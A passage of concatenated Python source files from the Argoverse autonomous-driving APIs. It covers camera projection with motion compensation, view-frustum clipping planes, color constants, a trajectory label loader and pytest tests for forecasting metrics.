uv = uv[:, :2] / uv[:, 2].reshape(-1, 1)
is_valid_points = self.cull_to_view_frustum(uv, points_cam)
return uv, points_cam, is_valid_points
def project_ego_to_img_motion_compensated(
self,
points_lidar_time: NDArrayFloat,
city_SE3_ego_cam_t: SE3,
city_SE3_ego_lidar_t: SE3,
) -> Tuple[NDArrayFloat, NDArrayFloat, NDArrayBool]:
"""Project points in the ego frame to the image with motion compensation.
Because of the high frame rate, motion compensation's role between the
sensors is not very significant, moving points only by millimeters
to centimeters. If the vehicle is moving at 25 miles per hour, equivalent
to 11 meters/sec, then in 17 milliseconds (the max time between a lidar sweep
and camera image capture) we should be able to move up to 187 millimeters.
This can be verified in practice as the mean_change:
mean_change = np.amax(points_h_cam_time.T[:,:3] - points_h_lidar_time ,axis=0)
Adjust LiDAR points for egovehicle motion. This function accepts the
egovehicle's pose in the city map both at camera time and also at
the LiDAR time.
We perform the following transformation:
pt_egovehicle_cam_t = egovehicle_cam_t_SE3_city * city_SE3_egovehicle_lidar_t * pt_egovehicle_lidar_t
Note that both "cam_time_points_h" and "lidar_time_points_h" are 3D points in the
vehicle coordinate frame, but captured at different times. These LiDAR points
always live in the vehicle frame, but just in different timestamps. If we take
a lidar point in the egovehicle frame, captured at lidar time, and bring it into
the map at this lidar timestamp, then we know the transformation from map to
egovehicle reference frame at the time when the camera image was captured.
Thus, we move from egovehicle @ lidar time, to the map (which is time agnostic),
then we move from map to egovehicle @ camera time. Now we suddenly have lidar points
living in the egovehicle frame @ camera time.
Args:
points_lidar_time: Numpy array of shape (N,3)
city_SE3_ego_cam_t: egovehicle pose when camera image was recorded.
city_SE3_ego_lidar_t: egovehicle pose when LiDAR sweep was recorded.
Returns:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: Numpy array of shape (N,3) representing coordinates of points within the camera frame.
is_valid_points_cam: boolean indicator of valid cheirality and within image boundary, as
boolean Numpy array of shape (N,).
Raises:
ValueError: If `city_SE3_ego_cam_t` or `city_SE3_ego_lidar_t` is `None`.
"""
if city_SE3_ego_cam_t is None:
raise ValueError("city_SE3_ego_cam_t cannot be `None`!")
if city_SE3_ego_lidar_t is None:
raise ValueError("city_SE3_ego_lidar_t cannot be `None`!")
ego_cam_t_SE3_ego_lidar_t = city_SE3_ego_cam_t.inverse().compose(city_SE3_ego_lidar_t)
points_cam_time = ego_cam_t_SE3_ego_lidar_t.transform_point_cloud(points_lidar_time)
return self.project_ego_to_img(points_cam_time)
@cached_property
def right_clipping_plane(self) -> NDArrayFloat:
"""Form the right clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = -self.intrinsics.fx_px, 0.0, self.width_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def left_clipping_plane(self) -> NDArrayFloat:
"""Form the left clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = self.intrinsics.fx_px, 0.0, self.width_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def top_clipping_plane(self) -> NDArrayFloat:
"""Top clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, self.intrinsics.fx_px, self.height_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
@cached_property
def bottom_clipping_plane(self) -> NDArrayFloat:
"""Bottom clipping plane for a camera view frustum.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, -self.intrinsics.fx_px, self.height_px / 2.0, 0.0
coeffs: NDArrayFloat = np.array([a, b, c, d]) / np.linalg.norm([a, b, c]) # type: ignore
return coeffs
def near_clipping_plane(self, near_clip_m: float) -> NDArrayFloat:
"""Near clipping plane for a camera view frustum.
Args:
near_clip_m: Near clipping plane distance in meters.
Returns:
(4,) tuple of Hessian normal coefficients.
"""
a, b, c, d = 0.0, 0.0, 1.0, -near_clip_m
coeffs: NDArrayFloat = np.array([a, b, c, d])
return coeffs
def frustum_planes(self, near_clip_dist: float = 0.5) -> NDArrayFloat:
"""Compute the planes enclosing the field of view (view frustum).
Reference (1): https://en.wikipedia.org/wiki/Viewing_frustum
Reference (2): https://en.wikipedia.org/wiki/Plane_(geometry)
Solve for the coefficients of all frustum planes:
ax + by + cz = d
Args:
near_clip_dist: Distance of the near clipping plane from the origin.
Returns:
(5, 4) matrix where each row corresponds to the coeffients of a plane.
"""
left_plane = self.left_clipping_plane
right_plane = self.right_clipping_plane
top_plane = self.top_clipping_plane
bottom_plane = self.bottom_clipping_plane
near_plane = self.near_clipping_plane(near_clip_dist)
planes: NDArrayFloat = np.stack([left_plane, right_plane, near_plane, bottom_plane, top_plane])
return planes
@cached_property
def egovehicle_yaw_cam_rad(self) -> float:
"""Compute the camera's yaw, in the egovehicle frame.
R takes the x axis to be a vector equivalent to the first column of R.
Similarly, the y and z axes are transformed to be the second and third columns.
Returns:
Counter-clockwise angle from x=0 (in radians) of camera center ray, in the egovehicle frame.
"""
egovehicle_SE3_camera = self.ego_SE3_cam
# the third column of this rotation matrix, is the new basis vector for the z axis (pointing out of camera)
# take its x and y components (the z component is near zero, as close to horizontal)
new_z_axis = egovehicle_SE3_camera.rotation[:, 2]
dx, dy, dz = new_z_axis
egovehicle_yaw_cam_rad = np.arctan2(dy, dx)
return float(egovehicle_yaw_cam_rad)
@cached_property
def fov_theta_rad(self) -> float:
"""Compute the field of view of a camera frustum to use for view frustum culling during rendering.
Returns:
Angular extent of camera's field of view (measured in radians).
"""
fov_theta_rad = 2 * np.arctan(0.5 * self.width_px / self.intrinsics.fx_px)
return float(fov_theta_rad)
def compute_pixel_ray_directions(self, uv: Union[NDArrayFloat, NDArrayInt]) -> NDArrayFloat:
"""Given (u,v) coordinates and intrinsics, generate pixel rays in the camera coordinate frame.
Assume +z points out of the camera, +y is downwards, and +x is across the imager.
Args:
uv: Numpy array of shape (N,2) with (u,v) coordinates
Returns:
Array of shape (N,3) with ray directions to each pixel, provided in the camera frame.
Raises:
ValueError: If input (u,v) coordinates are not (N,2) in shape.
RuntimeError: If generated ray directions are not (N,3) in shape.
"""
fx, fy = self.intrinsics.fx_px, self.intrinsics.fy_px
img_h, img_w = self.height_px, self.width_px
if not np.isclose(fx, fy, atol=1e-3):
raise ValueError(f"Focal lengths in the x and y directions must match: {fx} != {fy}")
if uv.shape[1] != 2:
raise ValueError("Input (u,v) coordinates must be (N,2) in shape.")
# Approximation for principal point
px = img_w / 2
py = img_h / 2
u = uv[:, 0]
v = uv[:, 1]
num_rays = uv.shape[0]
ray_dirs = np.zeros((num_rays, 3))
# x center offset from center
ray_dirs[:, 0] = u - px
# y center offset from center
ray_dirs[:, 1] = v - py
ray_dirs[:, 2] = fx
# elementwise multiplication of scalars requires last dim to match
ray_dirs = ray_dirs / np.linalg.norm(ray_dirs, axis=1, keepdims=True) # type: ignore
if ray_dirs.shape[1] != 3:
raise RuntimeError("Ray directions must be (N,3)")
return ray_dirs
def remove_nan_values(uv: NDArrayFloat, points_cam: NDArrayFloat) -> Tuple[NDArrayFloat, NDArrayFloat]:
"""Remove NaN values from camera coordinates and image plane coordinates (accepts corrupt array).
Args:
uv: image plane coordinates, as Numpy array of shape (N,2).
points_cam: Numpy array of shape (N,3) representing coordinates of points within the camera frame.
Returns:
uv_valid: subset of image plane coordinates, which contain no NaN coordinates.
is_valid_points_cam: subset of 3d points within the camera frame, which contain no NaN coordinates.
"""
is_u_valid = np.logical_not(np.isnan(uv[:, 0]))
is_v_valid = np.logical_not(np.isnan(uv[:, 1]))
is_uv_valid = np.logical_and(is_u_valid, is_v_valid)
uv_valid = uv[is_uv_valid]
is_valid_points_cam = points_cam[is_uv_valid]
return uv_valid, is_valid_points_cam
```
#### File: av2/rendering/color.py
```python
from typing import Final, Sequence, Tuple
import numpy as np
from matplotlib.colors import LinearSegmentedColormap
from av2.utils.typing import NDArrayFloat
RED_HEX: Final[str] = "#df0101"
GREEN_HEX: Final[str] = "#31b404"
RED_RGB: Final[Tuple[int, int, int]] = (255, 0, 0)
RED_BGR: Final[Tuple[int, int, int]] = RED_RGB[::-1]
BLUE_RGB: Final[Tuple[int, int, int]] = (0, 0, 255)
BLUE_BGR: Final[Tuple[int, int, int]] = BLUE_RGB[::-1]
HANDICAP_BLUE_RGB: Final[Tuple[int, int, int]] = (42, 130, 193)
HANDICAP_BLUE_BGR: Final[Tuple[int, int, int]] = HANDICAP_BLUE_RGB[::-1]
WHITE_RGB: Final[Tuple[int, int, int]] = (255, 255, 255)
WHITE_BGR: Final[Tuple[int, int, int]] = WHITE_RGB[::-1]
GRAY_BGR: Final[Tuple[int, int, int]] = (168, 168, 168)
DARK_GRAY_BGR: Final[Tuple[int, int, int]] = (100, 100, 100)
TRAFFIC_YELLOW1_RGB: Final[Tuple[int, int, int]] = (250, 210, 1)
TRAFFIC_YELLOW1_BGR: Final[Tuple[int, int, int]] = TRAFFIC_YELLOW1_RGB[::-1]
def create_colormap(color_list: Sequence[str], n_colors: int) -> NDArrayFloat:
"""Create hex colorscale to interpolate between requested colors.
Args:
color_list: list of requested colors, in hex format.
n_colors: number of colors in the colormap.
Returns:
array of shape (n_colors, 3) representing a list of RGB colors in [0,1]
"""
cmap = LinearSegmentedColormap.from_list(name="dummy_name", colors=color_list)
colorscale: NDArrayFloat = np.array([cmap(k * 1 / n_colors) for k in range(n_colors)])
# ignore the 4th alpha channel
return colorscale[:, :3] # type: ignore
```
#### File: motion_forecasting/eval/test_metrics.py
```python
from typing import Final
import numpy as np
import pytest
import av2.datasets.motion_forecasting.eval.metrics as metrics
from av2.utils.typing import NDArrayFloat, NDArrayNumber
# Build stationary GT trajectory at (0, 0)
test_N: Final[int] = 10
_STATIONARY_GT_TRAJ = np.zeros((test_N, 2))
# Case 1: K=1 forecast stationary at (1, 1)
forecasted_trajectories_stationary_k1 = np.ones((1, test_N, 2))
expected_ade_stationary_k1 = np.full((1,), np.sqrt(2))
expected_fde_stationary_k1 = np.full((1,), np.sqrt(2))
# Case 2: K=6 forecasts stationary at (1, 1)
forecasted_trajectories_stationary_k6 = np.ones((6, test_N, 2))
expected_ade_stationary_k6 = np.full((6,), np.sqrt(2))
expected_fde_stationary_k6 = np.full((6,), np.sqrt(2))
# Case 3: K=1 forecast in straight line on X axis
forecasted_trajectories_straight_k1 = np.stack([np.arange(test_N), np.zeros(test_N)], axis=1)[np.newaxis, ...] # 1xNx2
expected_ade_straight_k1 = np.full((1,), np.arange(test_N).mean())
expected_fde_straight_k1 = np.full((1,), test_N - 1)
# Case 4: K=6 forecasts in straight line on X axis
forecasted_trajectories_straight_k6: NDArrayFloat = np.concatenate( # type: ignore
[forecasted_trajectories_straight_k1] * 6, axis=0
) # 6xNx2
expected_ade_straight_k6 = np.full((6,), np.arange(test_N).mean())
expected_fde_straight_k6 = np.full((6,), test_N - 1)
# Case 5: K=1 forecast in diagonal line
forecasted_trajectories_diagonal_k1 = np.stack([np.arange(test_N), np.arange(test_N)], axis=1)[np.newaxis, ...] # 1xNx2
expected_ade_diagonal_k1 = np.full((1,), 6.36396103)
expected_fde_diagonal_k1 = np.full((1,), np.hypot(test_N - 1, test_N - 1))
@pytest.mark.parametrize(
"forecasted_trajectories, expected_ade",
[
(forecasted_trajectories_stationary_k1, expected_ade_stationary_k1),
(forecasted_trajectories_stationary_k6, expected_ade_stationary_k6),
(forecasted_trajectories_straight_k1, expected_ade_straight_k1),
(forecasted_trajectories_straight_k6, expected_ade_straight_k6),
(forecasted_trajectories_diagonal_k1, expected_ade_diagonal_k1),
],
ids=["stationary_k1", "stationary_k6", "straight_k1", "straight_k6", "diagonal_k1"],
)
def test_compute_ade(forecasted_trajectories: NDArrayNumber, expected_ade: NDArrayFloat) -> None:
"""Test that compute_ade returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
expected_ade: Expected average displacement error.
"""
ade = metrics.compute_ade(forecasted_trajectories, _STATIONARY_GT_TRAJ)
np.testing.assert_allclose(ade, expected_ade) # type: ignore
@pytest.mark.parametrize(
"forecasted_trajectories, expected_fde",
[
(forecasted_trajectories_stationary_k1, expected_fde_stationary_k1),
(forecasted_trajectories_stationary_k6, expected_fde_stationary_k6),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1),
(forecasted_trajectories_straight_k6, expected_fde_straight_k6),
(forecasted_trajectories_diagonal_k1, expected_fde_diagonal_k1),
],
ids=["stationary_k1", "stationary_k6", "straight_k1", "straight_k6", "diagonal_k1"],
)
def test_compute_fde(forecasted_trajectories: NDArrayNumber, expected_fde: NDArrayFloat) -> None:
"""Test that compute_fde returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
expected_fde: Expected final displacement error.
"""
fde = metrics.compute_fde(forecasted_trajectories, _STATIONARY_GT_TRAJ)
assert np.array_equal(fde, expected_fde)
@pytest.mark.parametrize(
"forecasted_trajectories, miss_threshold_m, expected_is_missed_label",
[
(forecasted_trajectories_stationary_k1, 2.0, False),
(forecasted_trajectories_stationary_k6, 2.0, False),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1[0] + 0.01, False),
(forecasted_trajectories_straight_k1, expected_fde_straight_k1[0] - 0.01, True),
(forecasted_trajectories_diagonal_k1, 2.0, True),
],
ids=["stationary_k1", "stationary_k6", "straight_below_threshold", "straight_above_threshold", "diagonal"],
)
def test_compute_is_missed_prediction(
forecasted_trajectories: NDArrayNumber, miss_threshold_m: float, expected_is_missed_label: bool
) -> None:
"""Test that compute_is_missed_prediction returns the correct output with valid inputs.
Args:
forecasted_trajectories: Forecasted trajectories for test case.
miss_threshold_m: Minimum distance threshold for final displacement to be considered a miss.
expected_is_missed_label: Expected is_missed label for test case.
"""
is_missed_prediction = metrics.compute_is_missed_prediction(
forecasted_trajectories, _STATIONARY_GT_TRAJ, miss_threshold_m
)
# Check that is_missed labels are of the correct shape and have the correct value
assert is_missed_prediction.shape == forecasted_trajectories.shape[:1]
assert np.all(is_missed_prediction == expected_is_missed_label)
``` |
{
"source": "johnwlambert/argoverse-api",
"score": 2
} |
#### File: argoverse/data_loading/trajectory_loader.py
```python
import collections
import glob
import json
import logging
import sys
from typing import List
import numpy as np
from argoverse.data_loading.object_classes import OBJ_CLASS_MAPPING_DICT
logger = logging.getLogger(__name__)
class TrajectoryLabel:
"""Trajectory object.
Args:
timestamps (np.array): Array of timestamps for trajectory.
quaternions (np.array): Array of quaternions for trajectory.
translations (np.array): Array of translations of SE3 poses for trajectory.
obj_class (int): Object class id.
obj_class_str (str): Object class name.
occlusions (np.array): Array of occlusions for trajectory.
track_uuid (str): Track uuid.
log_id (str): Log id.
max_length (float): Maximum length for trajectory.
max_width (float): Maximum width for trajectory.
max_height (float): Maximum height for trajectory.
lengths (np.array): Array of lengths for trajectory.
widths (np.array): Array of widths for trajectory.
heights (np.array): Array of heights for trajectory.
"""
def __init__(
self,
timestamps: np.ndarray,
quaternions: np.ndarray,
translations: np.ndarray,
obj_class: int,
obj_class_str: str,
occlusions: np.ndarray,
track_uuid: str,
log_id: str,
max_length: float,
max_width: float,
max_height: float,
lengths: np.ndarray,
widths: np.ndarray,
heights: np.ndarray,
) -> None:
"""Initialize TrajectoryLabel object.
Args:
timestamps (np.array): Array of timestamps for trajectory.
quaternions (np.array): Array of quaternions for trajectory.
translations (np.array): Array of translations of SE3 poses for trajectory.
obj_class (int): Object class id.
obj_class_str (str): Object class name.
occlusions (np.array): Array of occlusions for trajectory.
track_uuid (str): Track uuid.
log_id (str): Log id.
max_length (float): Maximum length for trajectory.
max_width (float): Maximum width for trajectory.
max_height (float): Maximum height for trajectory.
lengths (np.array): Array of lengths for trajectory.
widths (np.array): Array of widths for trajectory.
heights (np.array): Array of heights for trajectory.
"""
self.timestamps = timestamps
self.quaternions = quaternions
self.translations = translations
self.obj_class = obj_class
self.obj_class_str = obj_class_str
self.occlusion = occlusions
self.track_uuid = track_uuid
self.log_id = log_id
self.max_length = max_length
self.max_width = max_width
self.max_height = max_height
self.lengths = lengths
self.widths = widths
self.heights = heights
def load_json_track_labels(log_track_labels_dir: str) -> List[TrajectoryLabel]:
"""Trajectories are stored on disk as 1 track per 1 json file.
We load all labeled tracks here from the JSON files.
Args:
log_track_labels_dir (str): Log track directory.
Returns:
List[TrajectoryLabel]: a Python list of TrajectoryLabels.
"""
json_fpath_list = glob.glob(log_track_labels_dir, recursive=True)
trajectories = []
for file_idx, json_fpath in enumerate(json_fpath_list):
with open(json_fpath, "r") as f:
json_data = json.load(f)
track_uuid = json_fpath.split("/")[-1].split(".")[0]
obj_cls = json_data["label_class"]
# recent MLDS change
if isinstance(obj_cls, collections.abc.Mapping):
obj_cls = obj_cls["name"]
if obj_cls in OBJ_CLASS_MAPPING_DICT:
obj_cls_idx = OBJ_CLASS_MAPPING_DICT[obj_cls]
else:
logger.error(f"Unrecognized class {obj_cls}")
raise ValueError(f"Unrecognized class {obj_cls}")
quaternions = []
translations = []
timestamps = []
occlusions = []
lengths = []
widths = []
heights = []
for track_frame in json_data["track_label_frames"]:
# cuboid not occluded if not explicitly indicated.
occlusions.append(track_frame.get("occlusion", 0))
tr_center = track_frame["center"]
tr_x = tr_center["x"]
tr_y = tr_center["y"]
tr_z = tr_center["z"]
translation = np.array([tr_x, tr_y, tr_z])
translations.append(translation)
tr_rot = track_frame["rotation"]
rot_w = tr_rot["w"]
rot_x = tr_rot["x"]
rot_y = tr_rot["y"]
rot_z = tr_rot["z"]
quaternion = np.array([rot_w, rot_x, rot_y, rot_z])
quaternions.append(quaternion)
timestamps.append(track_frame["timestamp"])
lengths.append(track_frame["length"])
widths.append(track_frame["width"])
heights.append(track_frame["height"])
trajectory = TrajectoryLabel(
timestamps=np.array(timestamps),
quaternions=np.array(quaternions),
translations=np.array(translations),
obj_class=obj_cls_idx,
obj_class_str=obj_cls,
occlusions=np.array(occlusions),
track_uuid=track_uuid,
log_id=json_fpath.split("/")[-3],
max_length=max(lengths),
max_width=max(widths),
max_height=max(heights),
lengths=np.array(lengths),
widths=np.array(widths),
heights=np.array(heights),
)
trajectories.append(trajectory)
return trajectories
```
#### File: argoverse/utils/frustum_clipping.py
```python
import copy
import sys
from typing import Any, Iterable, List, Optional, Tuple
import numpy as np
from argoverse.utils.camera_stats import get_image_dims_for_camera
from argoverse.utils.manhattan_search import compute_point_cloud_bbox
def fit_plane_to_point_cloud(pc: np.ndarray) -> Tuple[Any, Any, Any, Any]:
"""Use SVD with at least 3 points to fit a plane.
Args:
pc: Array of shape (N, 3)
Returns:
a, b, c, d: float-like values defining ax + by + cz = d for the plane
"""
center = pc.sum(axis=0) / pc.shape[0]
u, s, vh = np.linalg.svd(pc - center)
# Get the unitary normal vector
u_norm = vh[2, :]
d = -np.dot(u_norm, center)
a, b, c = u_norm
return a, b, c, d
def form_right_clipping_plane(fx: float, img_width: int) -> np.ndarray:
"""Form the right clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z)--(x,y,z)
| /
| / ->outside of frustum
| / ->outside of frustum
| (w/2)/
o-----o IMAGE PLANE
| /
fx| /
| /
| /
O PINHOLE
Normal must point into the frustum. The plane moves +fx in z-axis for
every +w/2 in x-axis, so normal will have negative inverse slope components.
Then, enforce that x-component of normal points in negative direction.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_width: Image width in pixels
Returns:
right_plane: Array of shape (4,) for ax + by + cz = d
"""
right_plane = np.array([-fx, 0.0, img_width / 2.0, 0.0])
right_plane /= np.linalg.norm(right_plane)
return right_plane
def form_left_clipping_plane(fx: float, img_width: int) -> np.ndarray:
r"""Form the left clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z)-----(x,y,z)
\\ |
outside of frustum <- \\ |
outside of frustum <- \\ |
\\ (-w/2)|
o------o IMAGE PLANE
\\ |
\\ |
\\ |fx
\\ |
\\ |
O PINHOLE
Normal must point into the frustum. The plane moves +fx in z-axis for
every -w/2 in x-axis, so normal will have negative inverse slope components.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_width: Image width in pixels
Returns:
left_plane: Array of shape (4,) for ax + by + cz = d
"""
left_plane = np.array([fx, 0.0, img_width / 2.0, 0.0])
left_plane /= np.linalg.norm(left_plane)
return left_plane
def form_top_clipping_plane(fx: float, img_height: int) -> np.ndarray:
r"""Form the top clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The focal length is the distance to the center
of the image plane. We know that a similar triangle is formed as follows::
(x,y,z) (x,y,z)
\\=================//
\\ //
(-w/h,-h/2,fx) (w/h,-h/2,fx)
o-------------o
|\\ //| IMAGE PLANE
| \\ // | IMAGE PLANE
o--\\-----//--o
\\ //
\\ //
O PINHOLE
Normal must point into the frustum. The plane moves -h/2 in y-axis for every
+fx in z-axis, so normal will have negative inverse slope components. The
x-axis component is zero since constant in x.
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_height: Image height in pixels
Returns:
top_plane: Array of shape (4,) for ax + by + cz = d
"""
top_plane = np.array([0.0, fx, img_height / 2.0, 0.0])
top_plane /= np.linalg.norm(top_plane)
return top_plane
def form_low_clipping_plane(fx: float, img_height: int) -> np.ndarray:
r"""Form the low clipping plane for a camera view frustum.
Use 3 points to fit the low clipping plane. In the camera coordinate frame,
y is down the imager, x is across the imager, and z is along the optical axis.
We know that a similar triangle is formed as follows::
(x,y,z) (x,y,z)
\\ //
\\ o-------------o //
\\| IMAGE PLANE |//
| |/
(-w/h, h/2,fx) o-------------o (w/h, h/2,fx)
\\ //
\\ //
\\ //
\\ //
\\ //
O PINHOLE
Normal must point into the frustum. The plane moves +h/2 in y-axis for every
+fx in z-axis, so normal will have negative inverse slope components. The
x-axis component is zero since constant in x.
Then enforce that y-coord of normal points in neg y-axis dir(up) on low-clipping plane.
The z-coord should point in positive z-axis direction (away from camera).
The "d" in "ax + by + cz = d" is zero because plane goes through origin.
Args:
fx: Horizontal focal length in pixels
img_height: Image height in pixels
Returns:
low_plane: Array of shape (4,) for ax + by + cz = d
"""
low_plane = np.array([0.0, -fx, img_height / 2.0, 0.0])
low_plane /= np.linalg.norm(low_plane)
return low_plane
def form_near_clipping_plane(near_clip_dist: float) -> np.ndarray:
"""Form the near clipping plane for a camera view frustum.
In the camera coordinate frame, y is down the imager, x is across the imager,
and z is along the optical axis. The near clipping plane should point in
the positive z-direction (along optical axis).
We form "ax + by + cz = d", where "d" is a distance from the origin.
Args:
near_clip_dist: Near clipping plane distance in meters
Returns:
top_plane: Array of shape (4,) for ax + by + cz = d
"""
return np.array([0.0, 0.0, 1.0, -near_clip_dist])
def generate_frustum_planes(K: np.ndarray, camera_name: str, near_clip_dist: float = 0.5) -> Optional[List[np.ndarray]]:
"""Compute the planes enclosing the field of view (viewing frustum) for a single camera.
We do this using similar triangles.
tan(theta/2) = (0.5 * height)/focal_length
"theta" is the vertical FOV. Similar for horizontal FOV.
height and focal_length are both in pixels.
Note that ring cameras and stereo cameras have different image widths
and heights, affecting the field of view.
Ring Camera intrinsics K look like (in pixels)::
[1400, 0, 964] [fx,skew,cx]
[ 0,1403, 605] for [-, fy,cy]
[ 0, 0, 1] [0, 0, 1]
Args:
K: Array of shape (3, 3) representing camera intrinsics matrix
camera_name: String representing the camera name to get the dimensions of and compute the FOV for
near_clip_dist: The distance for the near clipping plane in meters
Returns:
planes: List of length 5, where each list element is an Array of shape (4,)
representing the equation of a plane, e.g. (a, b, c, d) in ax + by + cz = d
"""
img_width, img_height = get_image_dims_for_camera(camera_name)
if img_width is None or img_height is None:
return None
P = np.array([0.0, 0.0, 0.0])
fx = K[0, 0]
fy = K[1, 1]
right_plane = form_right_clipping_plane(fx, img_width)
left_plane = form_left_clipping_plane(fx, img_width)
near_plane = form_near_clipping_plane(near_clip_dist)
# The horizontal and vertical focal lengths should be very close to equal,
# otherwise something went wrong when forming K matrix.
assert np.absolute(fx - fy) < 10
low_plane = form_low_clipping_plane(fx, img_height)
top_plane = form_top_clipping_plane(fx, img_height)
planes = [left_plane, right_plane, near_plane, low_plane, top_plane]
return planes
def clip_segment_v3_plane_n(p1: np.ndarray, p2: np.ndarray, planes: List[np.ndarray]) -> Tuple[np.ndarray, np.ndarray]:
"""Iterate over the frustum planes and intersect them with the segment.
This updating the min/max, bailing out early if the min > max.
We exploit the fact that in a camera frustum, all plane
normals point inside the frustum volume.
See section "Line-Plane Intersection" for technical details at: http://geomalgorithms.com/a05-_intersect-1.html
"t" is the distance we travel along the ray from p1 to p2.
If "t" exceeds 1.0, then we have exceeded the line segment.
A similar function, written in C, can be found in the Blender source code at:
https://fossies.org/dox/blender-2.79b/math__geom_8c_source.html
Args:
p1: 3D vector defining a point to constrain a line segment
p2: 3D vector defining a point to constrain a line segment
planes: List of length 5, where each list element is an Array of shape (4,)
representing the equation of a plane, e.g. (a, b, c, d) in ax + by + cz = d
Returns:
2 vector triplets (the clipped segment) or (None, None) meaning the segment is entirely outside the frustum.
"""
dp = p2 - p1
p1_fac = 0.0
p2_fac = 1.0
for p in planes:
div = p[:3].dot(dp)
# check if line vector and plane normal are perpendicular
# if perpendicular, line and plane are parallel
if div != 0.0:
# if not perpendicular, find intersection
t = -plane_point_side_v3(p, p1)
if div > 0.0: # clip p1 lower bounds
if t >= div:
return None, None
if t > 0.0:
fac = t / div
if fac > p1_fac:
p1_fac = fac
if p1_fac > p2_fac:
# intersection occurs outside of segment
return None, None
elif div < 0.0: # clip p2 upper bounds
if t > 0.0:
return None, None
if t > div:
fac = t / div
if fac < p2_fac:
p2_fac = fac
if p1_fac > p2_fac:
return None, None
p1_clip = p1 + (dp * p1_fac)
p2_clip = p1 + (dp * p2_fac)
return p1_clip, p2_clip
def plane_point_side_v3(p: np.ndarray, v: np.ndarray) -> Any:
"""Get sign of point to plane distance.
This function does not compute the actual distance.
Positive denotes that point v is on the same side of the plane as the plane's normal vector.
Negative if it is on the opposite side.
Args:
p: Array of shape (4,) representing a plane in Hessian Normal Form, ax + by + cz + d = 0
v: A vector/3D point
Returns:
sign: A float-like value representing sign of signed distance
"""
return p[:3].dot(v) + p[3]
def cuboid_to_2d_frustum_bbox(corners: np.ndarray, planes: List[np.ndarray], K: np.ndarray) -> np.ndarray:
"""Convert a 3D cuboid to a 2D frustum bounding box.
We bring the 3D points into each camera, and do the clipping there.
Args:
corners: The corners to use as the corners of the frustum bounding box
planes: List of 4-tuples for ax + by + cz = d representing planes in Hessian Normal Form
K: 3x3 camera intrinsic matrix
Returns:
bbox_2d: Numpy array of shape (4,) with entries [x_min,y_min,x_max,y_max]
"""
def clip_line_segment(pt_a: np.ndarray, pt_b: np.ndarray, K: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:
"""Clip a line segment based on two points and the camera instrinc matrix.
Args:
pt_a: One 3D point vector constraining a line segment
pt_b: One 3D point vector constraining a line segment
K: A 3x3 array representing a camera intrinsic matrix
Returns:
a, b: A tuple of the clipped line segment 3D point vectors
"""
pt_a = K.dot(pt_a)
pt_a /= pt_a[2]
pt_b = K.dot(pt_b)
pt_b /= pt_b[2]
return np.round(pt_a).astype(np.int32), np.round(pt_b).astype(np.int32)
def clip_rect(selected_corners: np.ndarray, clipped_uv_verts: np.ndarray) -> np.ndarray:
"""Clip a rectangle based on the selected corners and clipped vertices coordinates.
Args:
selected_corners: A list of selected corners
clipped_uv_verts: A list of clipped vertices
Returns:
A new list of clipped vertices based on the selected corners
"""
prev = selected_corners[-1]
for corner in selected_corners:
# interpolate line segments to the image border
clip_prev, clip_corner = clip_segment_v3_plane_n(
copy.deepcopy(prev), copy.deepcopy(corner), copy.deepcopy(planes)
)
prev = corner
if clip_prev is None or clip_corner is None:
continue
a, b = clip_line_segment(clip_prev, clip_corner, K)
clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])
return clipped_uv_verts
clipped_uv_verts = np.zeros((0, 2))
# Draw the sides
for i in range(4):
corner_f = corners[i] # front corner
corner_b = corners[i + 4] # back corner
clip_c_f, clip_c_b = clip_segment_v3_plane_n(corner_f, corner_b, planes)
if clip_c_f is None or clip_c_b is None:
continue
a, b = clip_line_segment(clip_c_f, clip_c_b, K)
clipped_uv_verts = np.vstack([clipped_uv_verts, a[:2].reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, b[:2].reshape(-1, 2)])
# Draw front (first 4 corners) and rear (last 4 corners) rectangles(3d)/lines(2d)
front_verts = clip_rect(corners[:4], clipped_uv_verts)
back_verts = clip_rect(corners[4:], clipped_uv_verts)
clipped_uv_verts = np.vstack([clipped_uv_verts, front_verts.reshape(-1, 2)])
clipped_uv_verts = np.vstack([clipped_uv_verts, back_verts.reshape(-1, 2)])
if clipped_uv_verts.shape[0] == 0:
return None
bbox_2d = compute_point_cloud_bbox(clipped_uv_verts)
return bbox_2d
```
#### File: argoverse-api/integration_tests/test_map_api.py
```python
import glob
import matplotlib.pyplot as plt
import numpy as np
from argoverse.map_representation.map_api import ArgoverseMap
from argoverse.utils.datetime_utils import generate_datetime_string
from argoverse.utils.geometry import point_inside_polygon
